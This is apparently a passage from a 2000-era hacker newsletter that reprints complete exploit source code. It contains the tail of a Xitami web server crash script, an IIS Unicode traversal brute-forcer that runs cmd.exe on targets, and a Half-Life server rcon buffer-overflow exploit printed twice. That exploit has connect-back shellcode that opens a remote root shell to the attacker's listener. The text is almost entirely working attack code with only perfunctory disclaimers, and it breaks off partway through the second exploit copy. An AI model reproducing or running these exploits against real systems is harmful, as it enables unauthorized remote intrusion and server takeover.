        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\n\n"; 
        get[1] = " Please stand by a while when rebooting the system...\n ";
        if (argc<2)
          {
          printf("Usage: ./xitami <hostname> \n");
          exit(0);
          }
        if  ((he=gethostbyname(argv[1])) == NULL)
          { 
         herror("gethostbyname");
         exit(0);
          }
         sock=socket(AF_INET, SOCK_STREAM, 0);
         bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
         sin.sin_family=AF_INET;
         sin.sin_port=htons(80);
         if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
            {
          perror("connect");
          }
      
          send(sock, "HEAD / HTTP/1.0\n\n",17,0);
          recv(sock, buffer, sizeof(buffer),0);
          close(sock); 
          while(count++ < 1)
           {
             sock=socket(AF_INET, SOCK_STREAM, 0);
             bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
             sin.sin_family=AF_INET; 
             sin.sin_port=htons(80);
             if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
               {
                  perror("connect");
               }
              for(numin=0;numin < 1024;numin++)
               {
                get[numin] = '\0';
                }
            send(sock, buff[count],strlen(buff[count]),0);
            recv(sock, get, sizeof(get),0);
            
        }
      } 
      
      @HWA
      

331.0 [HWA] unicode M$ hack similar to those seen used recently by: Grazer
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more also check 
      http://hwa-security.net/hot.html for new 
      releases.
      
      
      
      
      /* HWA PRIVATE!!!!!! DO NOT DISTRIBUTE!!!!! 
      * ---------------------------------------------------------
      * NT iis Multi-language unicode scanner :)
      * 
      * Idea by pr0ix    -   pr0ix@hwa-security.net
      * Code by grazer   -   grazer@hwa-security.net
      *
      * Greets to all hwa-members : Cruciphux, pr0ix, pyra
      * forrest^, FProphet, eth0^, WhiteRuss, PhantasmP, xtremist, 
      * base2op....and all other cool people i forgot (sorry)
      *
      * Please do not use this tool for illegal purposes!
      * If you do we are not responsible!
      *
      *          grazer
      *
      * RELEASED by Cruciphux http://hwa-security.net/
      * OCT 27 2000
      *
      */
      
      #include<stdio.h>
      #include<string.h>
      #include<sys/socket.h>
      #include<netinet/in.h>
      #include<netdb.h> 
      
      #define RETURN "../winnt/system32/cmd.exe?/c+dir\n\n"
      
      main(int argc, char *argv[]) {
      
      int fd;
      struct sockaddr_in sin;
      struct in_addr addr;
      struct hostent *he;
      
      char not_found[] = "404"; 
      
      char recv_buffer[6024];
      char temp[3];
      char *try_to_find;
      
      int i;
      char char1, char3 = 'a';
      char char2, char4; 
      char percent = '%';
      char charac1, charac2, charac3, charac4, procent;
      
      while(argc<2) {
      printf ("\n [----------------------------] \n");
      printf (" [ NT IIS Unicode BruteForcer ] \n");
      printf (" [----------------------------] \n");
      printf (" [ usage : unibrute <NT_host> ] \n");
      printf (" [ by    :             grazer ] \n\n");     
      exit(0);   
      }
      
      if ((he=gethostbyname(argv[1])) == NULL) { 
           printf("\n [ Cannot Find Host!.. ] \n\n"); 
           exit(0); }
           
      printf("\n [ Starting NT Unicode Bruteforcer..]\n");   
      
      for (char1='a'; char1<='z'; char1++) {
      for (char3= 'a'; char3<='z'; char3++) {
      for (char2='0'; char2<='9'; char2++) {
         for (char4='0'; char4<='9'; char4++) {
      char buffer[1024] = "GET /scripts/..";
      fd = socket(AF_INET, SOCK_STREAM, 0);
      bcopy(he->h_addr, (char *) &sin.sin_addr, he->h_length);
      sin.sin_family=AF_INET;
      sin.sin_port=htons(80);
        
      
      if(connect(fd, (struct sockaddr*)&sin, sizeof(sin))!=0)
      {
      printf ("\n [ Cannot Connect() to Host ] \n\n ");
      exit(0);
      }
      
      buffer[15] = percent; buffer[16] = char1; buffer[17] = char2;
      buffer[18] = percent; buffer[19] = char3; buffer[20] = char4;
      strcat(buffer, RETURN);
      
      fprintf(stdout, ".");
      send(fd, buffer, sizeof(buffer), 0);
      recv(fd, recv_buffer, sizeof(recv_buffer), 0);
      
      close(fd);
      
      bzero(buffer, sizeof(buffer));
      
      try_to_find = strstr(recv_buffer,not_found);
      while(try_to_find == NULL)
      
      {
        printf ("\n [     Server is Vulnerable !!      ]\n");
        printf (" [               %c%c%c%c%c%c             ]\n\n", percent,
      char1, char2, percent, char3 , char4);
         
        exit(0); 
           }
          }
         }
        }
      }
      printf ("\n [   Sorry Nothing Found on Server..  ]\n");
      }
      
      @HWA

332.0 [HWA] Release: Hlds Half life server vuln by csh **
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     ** This was also released in another form by csh and another security team
     both code is included here with comments.
     
     http://hwa-security.net
     http://hwa-security.net/hot.html
      
     Check http://hwa-security.net for more also check 
     http://hwa-security.net/hot.html for new 
     releases.
      
     
     /*
      --- advisory here (vvvv) ---
      
       
       THIS IS A PRIVATE RELEASE - DO NOT DISTRIBUTE IT
       
      * distribution note: 
      * released through hwa-security.net Oct 23 2000 *
      * EFNet #hwa-security contact@hwa-security.net
      * posted by csh
       
      --- end of advisory --- 
      
      
      ----- tmd info tag -----
      v  HalfLife Dedicated Server    (3.1.0.x)
      w  october, 19th 2000
      a  Thiago Zaninotti             (thiago@sekure.org)
      a  Gustavo Scotti               (scotti@sekure.org)
      g  Tamanduah Sekure Labs        (http://tamandua.sekure.org)
      i  do not run this behind a masquerade server. the shellcode is a connect back
      i  and it does probe for local address/port for buffer alignment.
      */
      
      #include <stdlib.h>
      #include <stdio.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/time.h>
      #include <netdb.h>
      
      typedef unsigned long   u32;
      typedef unsigned short  u16;
      typedef unsigned char   u8;
      
      /* shell code source code.
      
         jmp    next
      back:
         popl   %esi
         jmp    start
      next:
         call   back
         .string \"0123456789012345/bin/sh\"
      
      start:   
         // now some adds to include the sockaddr stuff
         // fill in sin family
         xorl   %eax, %eax
         incw   %ax
         incw   %ax
         movw   %ax,  (%esi)    // FAMILY 2 = AF_INET
         xorl   %ecx, %ecx
         movb   $0x8, %cl
         movl   %esi, %edi
         addl   $0x8, %edi
         // now pad 0 sock_addr
         xorb   %al,  %al
      redo:
         movb   %al, (%edi)
         incl   %edi
         decl   %ecx
         jnz    redo
      
         // kernel socket buffer is allocated 0x20 after sockaddr
         // socket 
             xorl   %eax, %eax
             movl   %eax, 0x28(%esi)          // 0, TCP/IP 
             incl   %eax
             movl   %eax, 0x24(%esi)          // 1, SOCK_STREAM
             incl   %eax
             movl   %eax, 0x20(%esi)          // 2, AF_INET
             leal   0x20(%esi), %ecx          // params to socket syscall
             xorl   %ebx, %ebx
             incl   %ebx                      // ebx = 1 - function socket
             xor    %eax, %eax
             addl   $0x66, %eax               // socket syscall
             int    $0x80                     // sycall int
      
         mov    %eax, %edi
         // %edi is the socket descriptor 
         // connect 
             movl   %eax, 0x20(%esi)          // socket
             leal   (%esi), %eax
             movl   %eax, 0x24(%esi)          // &sockaddr_in
             xorl   %eax, %eax
             addl   $0x10, %eax               // sizeof(sockaddr_in)
             movl   %eax, 0x28(%esi)          
      
             leal   0x20(%esi), %ecx          // params to socket syscall
             xorl   %ebx, %ebx
             incl   %ebx                      
             incl   %ebx                      
             incl   %ebx                      // ebx = 2 - function connect
             xorl   %eax, %eax
             addl   $0x66, %eax               // socket syscall
             push   %edi                      // save your socket descriptor
             int    $0x80                     // sycall int
             pop    %edi
      
         // dup2 sock, 0 
             xorl   %eax, %eax
             addl   $0x3f, %eax
             movl   %edi,  %ebx
             xorl   %ecx,  %ecx
             int    $0x80
      
         // dup2 0, 1
             xorl   %eax, %eax
             addl   $0x3f, %eax
             xorl   %ebx,  %ebx
             xorl   %ecx,  %ecx
             incl   %ecx
             int    $0x80
      
         // dup2 0, 2
             xorl   %eax, %eax
             addl   $0x3f, %eax
             xorl   %ebx,  %ebx
             xorl   %ecx,  %ecx
             incl   %ecx
             incl   %ecx
             int    $0x80
      
         // trivial shell-code
         movl   %esi,  %eax
         addl   $0x18, %eax       // endereco onde vai ficar ENVP
         movl   %eax, 0x18(%esi)  // *envp
      
         xorl   %eax, %eax
         movb   %al,  0x17(%esi)
         movl   %eax, 0x1c(%esi)
      
         movb   $0xb, %al
         leal   0x18(%esi), %ecx    // params 
         leal   0x1c(%esi), %edx    // envp 
         movl   %esi, %ebx
         addl   $0x10, %ebx
         int    $0x80
         xorl   %eax, %eax
         incl   %eax
         int    $0x80
      */
      
      unsigned char shellcode[]=
      "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff.www.sekure.org."
      "\x2f\x62\x69\x6e\x2f"
      "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08"
      "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89"
      "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
      "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46"
      "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43"
      "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89"
      "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd"
      "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0"
      "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b"
      "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40"
      "\xcd\x80";
      
      /* NET functions */
      int
      udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              int i,n;
              i = sizeof(server);
              n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i);
              *daddr = ntohl(server.sin_addr.s_addr);
              *port = ntohs(server.sin_port);
              return n;
      }
      
      int
      udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              server.sin_family = AF_INET;
              server.sin_port = htons( port);
              server.sin_addr.s_addr = htonl( daddr);
              return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server));
      }
      
      int
      udp_connect( u32 addr, u16 port)
      {
              struct sockaddr_in client;
              int new_fd;
      
              new_fd = socket( AF_INET, SOCK_DGRAM, 0);
              if (new_fd<0)
                 return new_fd;
      
              bzero( (char *) &client, sizeof( client));
              client.sin_family = AF_INET;
              client.sin_addr.s_addr = htonl( addr);
              client.sin_port = htons( port);
              if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0)
                 return -1; /* cant bind local address */
      
              return new_fd;
      }
      
      
      u32 dns2ip( u8 *host)
      {
              struct hostent *dns;
              u32     saddr;
              dns = gethostbyname( host);
              if (!dns)
                 return 0xffffffff;
              bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
              return ntohl(saddr);
      }
      
      
      int
      async_read( int sock_r, int rettime)
      {
         fd_set           fd_r;
         struct timeval   tv;
         char             try_ch[4]="/-\\|";
      
         int r,j;
      
         for (r=0;r<rettime;r++)
             {
             for (j=0;j<20;)
                 {
                 int i;
      
                 printf("\b%c", try_ch[(j%4)]);
                 fflush(stdout);
      
                 FD_ZERO( &fd_r);
                 FD_SET( sock_r, &fd_r);
      
                 tv.tv_sec  = 0;
                 tv.tv_usec = 50000;
      
                 
                 i =select( sock_r + 1, &fd_r, NULL, NULL, &tv);
                 if (!i) { j++; continue; }
                 if (i>0)
                    if (FD_ISSET(sock_r, &fd_r)) return sock_r;
                 else
                    return -1;
                 }
             }
         return -1;
      }
      
      int
      get_server_info( int sock, u32 addr, u16 port)
      {
         u32 r_addr;
         u16 r_port;
         int n, i;
         u8  pkt[256], *str;
      
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf(&pkt[4], "details");
      
         n = udp_send(sock, addr, port, pkt, strlen(pkt));
         printf(".  connecting to the server...  "); fflush(stdout);
         if (async_read(sock, 6)<0)
             goto server_down;
         n = udp_read(sock, &addr, &port, pkt, sizeof(pkt));
         if (n<0)
              {
      server_down:
              printf("\bserver down!\r*\n");
              exit(0);
              }
         printf("\bdone\n");
         str = &pkt[4]; 
         str+=strlen(str)+1;
         printf("\t server_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\t    map_name  [%s]\n", str); str+=strlen(str)+1;
         str+=strlen(str)+1;
      
         printf("\t   game_name  [%s]\n", str); str+=strlen(str)+1;
         printf("\tusers_online  [%d of %d]\n", str[0], str[1]); str+=3;
         printf("\t   remote_OS  [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown")));
         if (str[1]=='w') return 2;
         if (str[1]=='l') return 1;
         return 0;
      }
      
      u32 retrieve_local_info(int sock, u8 *host)
      {
         struct sockaddr_in server;
         int    soclen;
         soclen = sizeof(server);
         if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
             {
             printf("*  error in getsockname\n");
             exit(0);
             }
         snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port));
         return htonl(server.sin_addr.s_addr);
      }
      
      int 
      bind_tcp( int *port)
      {
         struct sockaddr_in mask_addr;
         int sock, portno=25000; /* base_port */
      
         sock = socket( AF_INET, SOCK_STREAM, 0);
         if (sock<0)
            return sock;
      
      redo:
         mask_addr.sin_family = AF_INET;
         mask_addr.sin_port = htons( portno);
         mask_addr.sin_addr.s_addr = 0;
      
         if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
            {
      error:
            portno++;
            if (portno>26000)
               {
               printf("*  no TCP port to bind in.\n");
               exit(0);
               }
            goto redo;
            }
         if (listen( sock, 0)<0)
            goto error;
      
         printf(".  TCP listen port number %d\n", portno);
         *port = portno;
         return sock;
      }
      
      wait_for_connect(int sock)
      {
         fd_set fds;
         u8     tmp[256];
         int    tcp, addr_len;
         struct sockaddr_in server;
      
         printf(".  waiting for connect_back shellcode response...  ");
         if (async_read(sock, 40)!=sock)
              {
              printf("\bfailed!\r*\n");
              exit(0);
              }
          tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
          printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
          close(sock); /* closing incoming socket */
          printf(".  congratulations. you have owned this one.\n");
          
          sprintf(tmp,"uname -a; id\n");
          send(tcp, tmp, strlen(tmp), 0);
          /* basic async mode */
          while (1)
              {
              FD_ZERO(&fds);
              FD_SET(0, &fds);
              FD_SET(tcp, &fds);
             
              if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
                 {
                 if (FD_ISSET(0, &fds))
                    {
                    int n;
                    n = read(0, tmp, 256);
                    if (n<0)
                       goto end_conn;
                    if (write(tcp, tmp, n)!=n) goto end_conn;
                    }
                 if (FD_ISSET(tcp, &fds))
                    {
                    int n;
                    n = read(tcp, tmp, 256);
                    if (n<0)
                       goto end_conn;
      
                    if (write(0, tmp, n)!=n) goto end_conn;
                    }
                 }
              }
      end_conn:
          close(tcp);
          printf(".  bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n");  
      }
      
      assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo)
      {
         u8    pkt[2048], 
               *shell_ptr;
         struct sockaddr_in *sc_server;
         u32   ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40;
         int   i, n, tcp, tcp_port;
      
         printf(".  localinfo %s\n", linfo);
         tcp = bind_tcp( &tcp_port);
         sc_server = (struct sockaddr_in *)&shellcode[10];
         sc_server->sin_addr.s_addr = htonl(laddr);
         sc_server->sin_port = htons(tcp_port);
      
         last_byte-=strlen(linfo);
         pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
         sprintf( &pkt[4], "rcon ");
         i = strlen(pkt);
         shell_ptr = &pkt[i];
      
         /* find out how many nops we can push before shellcode */
         n = last_byte - i - sizeof(shellcode)-1 - over_head;
         for (i=0;i<n;i++)
             shell_ptr[i] = 0x90; /* nop */
         shell_ptr+=i;
      
         /* fill in the shellcode */
         for (i=0;i<sizeof(shellcode)-1;i++)
             shell_ptr[i] = shellcode[i];
         shell_ptr+=i;
      
         /* fill in the overhead buffer */
         for (i=0;i<over_head;i++)
             shell_ptr[i] = '-';
         shell_ptr+=i;
      
         /* fill return address and ebp */
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
         *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
      
         /* finalize string */
         *shell_ptr = 0;
      
         n = udp_send( sock, addr, port, pkt, strlen(pkt));
         printf(".  sending poison code. %d bytes sent\n",n);
         wait_for_connect(tcp);
      }
      
      usage()
      {
          exit(0);
      }
      
      main(int argc, char **argv)
      {
         u32 addr, laddr;
         u16 port;
      
         int sock, i;
         u8  linfo[256], *tmp = NULL;
      
         printf(".  half-life 3.1.0.x remote buffer-overflow for linux x86\n");
         printf(".  (c)2000 Tamandua Sekure Laboratories\n");
         printf(".  (c)2000 Thiago Zaninotti & Gustavo Scotti\n");
      
         if (argc<2)
            usage();
      
         tmp = (u8 *)strchr(argv[1], ':');
         if (tmp)
            {
            *tmp = 0; tmp++;
            port = atoi(tmp);
            }
         else
            {
            printf(":  port not found, using default 27015\n");
            port = 27015;
            }
      
         addr = dns2ip(argv[1]);
      
         if (addr==0xffffffff)
            {
            printf("*  host not found!\n");
            exit(0);
            }
      
         sock = udp_connect( addr, port);
         laddr = retrieve_local_info(sock, linfo);
         if (get_server_info(sock, addr, port)!=1)
            {
            printf("*  this is not a linux server. no shellcode available!\n");
            exit(0);
            }
         assembly_shell_code(sock, addr, port, laddr, linfo); 
         
      }
      
      /* -==- END HWA PoC CODE RELEASE -==- */
      
      
      New release with comments/advisory.
      
      /*
       *  SDI HalfLife rcon remote exploit for linux x86
       *  (portuguese) exploit remoto para o buffer overflow do rcon no halflife
       *
       *  Tamandua Sekure Labs (Sao Paulo - Porto Alegre, Brazil)
       *  by Thiago Zaninotti (c0nd0r) <condor@sekure.org>
       *     Gustavo Scotti   (csh)    <csh@sekure.org>
       *
       *  Proof of concept - There is a remote exploitable buffer overflow
       *  in Half Life server (3.1.0.x) for linux (HLDS). The problem is
       *  related to the RCON command (Remote CONsole).
       *  (port.) Existe um buffer overflow exploitavel no Half Life Server
       *  (HLDS) relacionado ao comando RCON.
       *
       *  After several tests, we found out the 'rcon' command is also vulnerable
       *  to a format string attack which can lead to a remote exploitation.
       *  (port) O comando RCON tambem e' vulneravel a um format string attack.
       *
       *  YOU DO NOT NEED THE RCON PASSWORD TO EXPLOIT THIS VULNERABILITY,
       *  which means any multiplayer server is vulnerable to the attack.
       *  (port) Voce nao precisa de password para explorar esta vulnerabilidade,
       *    o que significa que qualquer servidor e' vulneravel.
       *
       *  Agradecimentos: Tamandua Sekure Labs - Fabio Ramos (framos@axur.org),
       *  Eduardo Freitas, Marcos Sposito, Roberto Monteiro (casper),
       *  Nelson Britto (stderr), Sabrina Monteiro, Gabriel Zaninotti e
       *  Felipe Salum. A todos os leitores da Best of Security Brasil (BOS-BR).
       *
       *  Respects: c_orb, el8.org (specially duke), meta, guys at core sdi,
       *  the "infame" TOXYN.ORG (pt rocks) - r00t, pr0m, horizon, plaguez,
       *  ratao and p.ulh.as/promisc.net crew. Greetz to AXUR.ORG too! guys at
       *  sekure.org: vader, jamez, falcon and staff.
       *
       *  WE DO NOT TAKE ANY RESPONSABILITY. DO NOT USE THIS CODE TO GAIN
       *  UNAUTHORIZED ACCESS TO A REMOTE SERVER -- THIS IS NOT LEGAL.
       *
       *  also thanks to botman (botman@mailandnews.com) and pudim.
       *  Visit the brazilian security portal: http://www.securenet.com.br
       */
      
      #include <stdlib.h>
      #include <stdio.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/time.h>
      #include <netdb.h>
      
      typedef unsigned long   u32;
      typedef unsigned short  u16;
      typedef unsigned char   u8;
      
      unsigned char shellcode[]=
      "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff scotti@axur.org"
      "\x2f\x62\x69\x6e\x2f"
      "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08"
      "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89"
      "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
      "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46"
      "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43"
      "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89"
      "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd"
      "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0"
      "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b"
      "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40"
      "\xcd\x80";
      
      
      /* NET functions */
      int
      udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              int i,n;
              i = sizeof(server);
              n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i);
              *daddr = ntohl(server.sin_addr.s_addr);
              *port = ntohs(server.sin_port);
              return n;
      }
      
      int
      udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size)
      {
              struct sockaddr_in server;
              server.sin_family = AF_INET;
              server.sin_port = htons( port);
              server.sin_addr.s_addr = htonl( daddr);
              return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server));
      }
      
      int
      udp_connect( u32 addr, u16 port)
      {
              struct sockaddr_in client;
              int new_fd;
      
              new_fd = socket( AF_INET, SOCK_DGRAM, 0);
              if (new_fd<0)
                 return new_fd;
      
              bzero( (char *) &client, sizeof( client));
              client.sin_family = AF_INET;
              client.sin_addr.s_addr = htonl( addr);
              client.sin_port = htons( port);
              if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0)
                 return -1; /* cant bind local address */
      
              return new_fd;
      }
      
      
      u32 dns2ip( u8 *host)
      {
              struct hostent *dns;
              u32     saddr;
              dns = gethostbyname( host);
              if (!dns)
                 return 0xffffffff;
              bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
              return ntohl(saddr);
      }
      
      
      int
      async_read( int sock_r, int rettime)
      {
         fd_set           fd_r;
         struct timeval   tv;
         char             try_ch[4]="/-\\|";
      
         int r,j;
      
         for (r=0;r<rettime;r++)
             {
             for (j=0;j<20;)
                 {
                 int i;
      
                 printf("\b%c", try_ch[(j%4)]);
                 fflush(stdout);
      
                 FD_ZERO( &fd_r);
                 FD_SET( sock_r, &fd_r);
      
                 tv.tv_sec  = 0;
                 tv.tv_usec = 50000;
      
      
                 i =select( sock_r + 1, &fd_r, NULL, NULL, &tv);
                 if (!i) { j++; continue; }
                 if (i>0)
